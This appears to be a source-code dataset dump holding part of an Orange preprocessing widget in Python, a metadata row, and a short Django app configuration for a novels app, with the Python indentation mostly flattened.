<description>Constructs data preprocessors.</description>
<icon>icons/FeatureConstructor.png</icon>
<priority>11</priority>
<contact>Janez Demsar (janez.demsar(@at@)fri.uni-lj.si)</contact>
"""
from OWWidget import *
import OWGUI, math, re
from orngWrap import Preprocessor
class OWPreprocessing(OWWidget):
contextHandlers = {"": PerfectDomainContextHandler()}
def __init__(self,parent=None, signalManager = None):
OWWidget.__init__(self, parent, signalManager, "Preprocessing")
self.inputs = [("Examples", ExampleTable, self.setData)]
self.outputs = [("Preprocessor", Preprocessor), ("Examples", ExampleTable)]
OWGUI.button(self.controlArea, self, "Apply", callback=self.apply)
self.loadSettings()
self.apply()
self.adjustSize()
def setData(self, data):
self.data = data
self.sendData()
def sendData(self):
if not self.data or not self.preprocessor:
self.preprocessed = self.data
else:
self.preprocessed = self.preprocessor.processData(self.data)
self.send("Examples", self.preprocessed)
def apply(self):
        # The widget needs to construct a new Preprocessor instance on every apply.
        # If it modified and re-sent the same instance each time, it would mutate an
        # object already handed to other widgets; a widget behind a disabled
        # connection must receive neither the modifications nor a notification
        # that the preprocessor has changed.
self.preprocessor = Preprocessor()
self.send("Preprocessor", self.preprocessor)
| [
"[email protected]"
] | |
484b36d95ccf1122a18ef55f269dda7d400b80d3 | 1e19cab9c19562477cf561a88949faeee3731015 | /quanbenxiaoshuo/novels/apps.py | 19579c3e8a0d90b30a3869db99775e9dc90b0c58 | [] | no_license | sugyli/a_dou | 62f5c3090f4001b68613a0b7c30526a58f512aa7 | 4c3121495416361d7f4bfe97e3ed15c61c28f1e3 | refs/heads/master | 2021-06-24T12:30:44.018193 | 2019-12-02T05:27:41 | 2019-12-02T05:27:41 | 205,197,259 | 0 | 0 | null | 2021-02-08T20:36:17 | 2019-08-29T15:45:23 | JavaScript | UTF-8 | Python | false | false | 120 | py | from django.apps import AppConfig
class NovelsConfig(AppConfig):
name = 'novels'
    verbose_name = u'小说管理'  # "Novel management"
| [
"“[email protected]”"
] |